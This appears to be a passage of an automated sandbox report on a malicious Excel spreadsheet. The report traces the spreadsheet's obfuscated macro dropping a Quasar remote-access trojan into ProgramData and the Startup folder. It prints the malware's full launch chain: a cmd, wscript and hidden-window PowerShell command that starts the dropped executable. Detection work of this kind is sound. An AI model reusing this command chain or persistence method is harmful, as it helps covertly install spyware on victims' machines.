                  Source: unknown | HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49748 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49755 version: TLS 1.2
                  Source: a.exe, 00000001.00000002.708928788.0000000000AFB000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                  System Summary:

                  Malicious sample detected (through community Yara rule)
                  Source: 0000000B.00000002.777758927.0000000003B6D000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detects Quasar RAT, Author: Florian Roth
                  Source: 0000000D.00000002.947711194.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Detects Quasar RAT, Author: Florian Roth
                  Source: 00000001.00000002.710965832.0000000003A90000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detects Quasar RAT, Author: Florian Roth
                  Source: 00000001.00000002.710604971.0000000003889000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detects Quasar RAT, Author: Florian Roth
                  Source: 00000011.00000002.853281517.00000000039A1000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detects Quasar RAT, Author: Florian Roth
                  Source: 0000000B.00000002.775905725.0000000003969000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detects Quasar RAT, Author: Florian Roth
                  Source: 00000011.00000002.858549049.0000000003C8C000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detects Quasar RAT, Author: Florian Roth
                  Source: 0000000B.00000002.775433502.0000000003881000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detects Quasar RAT, Author: Florian Roth
                  Source: 00000011.00000002.854642346.0000000003A89000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detects Quasar RAT, Author: Florian Roth
                  Source: 00000014.00000002.866618994.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Detects Quasar RAT, Author: Florian Roth
                  Source: 17.2.a.exe.3bbc1e0.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Quasar RAT, Author: Florian Roth
                  Source: 17.2.a.exe.3a89990.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Quasar RAT, Author: Florian Roth
                  Source: 11.2.a.exe.3a9c1e0.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Quasar RAT, Author: Florian Roth
                  Source: 1.2.a.exe.3889990.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Quasar RAT, Author: Florian Roth
                  Source: 20.2.a.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Quasar RAT, Author: Florian Roth
                  Source: 11.2.a.exe.3b7c240.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Quasar RAT, Author: Florian Roth
                  Source: 11.2.a.exe.3969990.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Quasar RAT, Author: Florian Roth
                  Source: 1.2.a.exe.39bc1e0.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Quasar RAT, Author: Florian Roth
                  Source: 17.2.a.exe.3c9c240.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Quasar RAT, Author: Florian Roth
                  Source: 1.2.a.exe.3a9c240.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Quasar RAT, Author: Florian Roth
                  Source: 13.2.a.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Quasar RAT, Author: Florian Roth
                  Found Excel 4.0 Macro with suspicious formulas
                  Source: LIQUIDACION INTERBANCARIA 02_22_2021.xls | Initial sample: EXEC
                  Found obfuscated Excel 4.0 Macro
                  Source: LIQUIDACION INTERBANCARIA 02_22_2021.xls | Initial sample: High usage of CHAR() function: 23
                  Office process drops PE file
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\ProgramData\a.exe
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\mensajeria_system[1].exe
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeCode function: 13_2_06E03F58
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeCode function: 13_2_06E01B88
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeCode function: 13_2_02BDD250
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeCode function: 17_2_028DC154
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeCode function: 17_2_028DE589
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeCode function: 17_2_028DE598
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeCode function: 20_2_01560740
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeCode function: 20_2_0156579D
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeCode function: 20_2_015604D8
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeCode function: 20_2_015604C9
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeCode function: 20_2_01560730
                  Source: LIQUIDACION INTERBANCARIA 02_22_2021.xlsOLE indicator, VBA macros: true
                  Matched rule: Quasar_RAT_1 (date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/) in each of the following sources:
                  Source: 0000000B.00000002.777758927.0000000003B6D000.00000004.00000001.sdmp, type: MEMORY
                  Source: 0000000D.00000002.947711194.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: 00000001.00000002.710965832.0000000003A90000.00000004.00000001.sdmp, type: MEMORY
                  Source: 00000001.00000002.710604971.0000000003889000.00000004.00000001.sdmp, type: MEMORY
                  Source: 00000011.00000002.853281517.00000000039A1000.00000004.00000001.sdmp, type: MEMORY
                  Source: 0000000B.00000002.775905725.0000000003969000.00000004.00000001.sdmp, type: MEMORY
                  Source: 00000011.00000002.858549049.0000000003C8C000.00000004.00000001.sdmp, type: MEMORY
                  Source: 0000000B.00000002.775433502.0000000003881000.00000004.00000001.sdmp, type: MEMORY
                  Source: 00000011.00000002.854642346.0000000003A89000.00000004.00000001.sdmp, type: MEMORY
                  Source: 00000014.00000002.866618994.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: 17.2.a.exe.3bbc1e0.2.raw.unpack, type: UNPACKEDPE
                  Source: 17.2.a.exe.3a89990.1.raw.unpack, type: UNPACKEDPE
                  Source: 11.2.a.exe.3a9c1e0.1.raw.unpack, type: UNPACKEDPE
                  Source: 1.2.a.exe.3889990.2.raw.unpack, type: UNPACKEDPE
                  Source: 20.2.a.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: 11.2.a.exe.3b7c240.3.raw.unpack, type: UNPACKEDPE
                  Source: 11.2.a.exe.3969990.2.raw.unpack, type: UNPACKEDPE
                  Source: 1.2.a.exe.39bc1e0.1.raw.unpack, type: UNPACKEDPE
                  Source: 17.2.a.exe.3c9c240.3.raw.unpack, type: UNPACKEDPE
                  Source: 1.2.a.exe.3a9c240.3.raw.unpack, type: UNPACKEDPE
                  Source: 13.2.a.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: 13.2.a.exe.400000.0.unpack, oXs/KX8.cs | Cryptographic APIs: 'CreateDecryptor'
                  Source: 13.2.a.exe.400000.0.unpack, oXs/KX8.cs | Cryptographic APIs: 'CreateDecryptor'
                  Source: classification engine | Classification label: mal100.troj.adwa.spyw.expl.evad.winXLS@21/14@13/5
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache
                  Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6616:120:WilError_01
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe | Mutant created: \Sessions\1\BaseNamedObjects\Kdjaq
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\{1430B6D9-1049-4B57-9D78-04A0226B6D97} - OProcSessId.dat
                  Source: LIQUIDACION INTERBANCARIA 02_22_2021.xls | OLE indicator, Workbook stream: true
                  Source: C:\ProgramData\a.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM WIN32_PROCESSOR
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File read: C:\Users\desktop.ini
                  Source: C:\ProgramData\a.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: C:\ProgramData\a.exe | File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\ProgramData\a.exe | File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe | File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe | File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe | File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe | File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe | File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe | File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe | File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe | File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe | File read: C:\Windows\System32\drivers\etc\hosts
                  Source: unknown | Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                  Source: unknown | Process created: C:\ProgramData\a.exe C:\PROGRAMDATA\a.exe
                  Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c timeout 4 & 'C:\Windows\System32\wscript.exe' 'C:\Users\user\AppData\Local\Temp\\499262.js' && powershell -command Start-Sleep -s 4; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'
                  Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknown | Process created: C:\Windows\SysWOW64\timeout.exe timeout 4
                  Source: unknown | Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\wscript.exe' 'C:\Users\user\AppData\Local\Temp\\499262.js'
                  Source: unknown | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command Start-Sleep -s 4; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'
                  Source: unknown | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'
                  Source: unknown | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe
                  Source: unknown | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe
                  Source: unknown | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'
                  Source: unknown | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\ProgramData\a.exe C:\PROGRAMDATA\a.exe
                  Source: C:\ProgramData\a.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c timeout 4 & 'C:\Windows\System32\wscript.exe' 'C:\Users\user\AppData\Local\Temp\\499262.js' && powershell -command Start-Sleep -s 4; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout 4
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\wscript.exe' 'C:\Users\user\AppData\Local\Temp\\499262.js'
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command Start-Sleep -s 4; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe
                  Source: C:\ProgramData\a.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                  Source: Window Recorder | Window detected: More than 3 window changes detected
                  Source: C:\ProgramData\a.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll
                  Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256f source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp
                  Source: Binary string: C:\Users\Administrator\Desktop\CalcFis\obj\Debug\CalcFis.pdb source: a.exe, mensajeria_system[1].exe.0.dr
                  Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp

                  Data Obfuscation: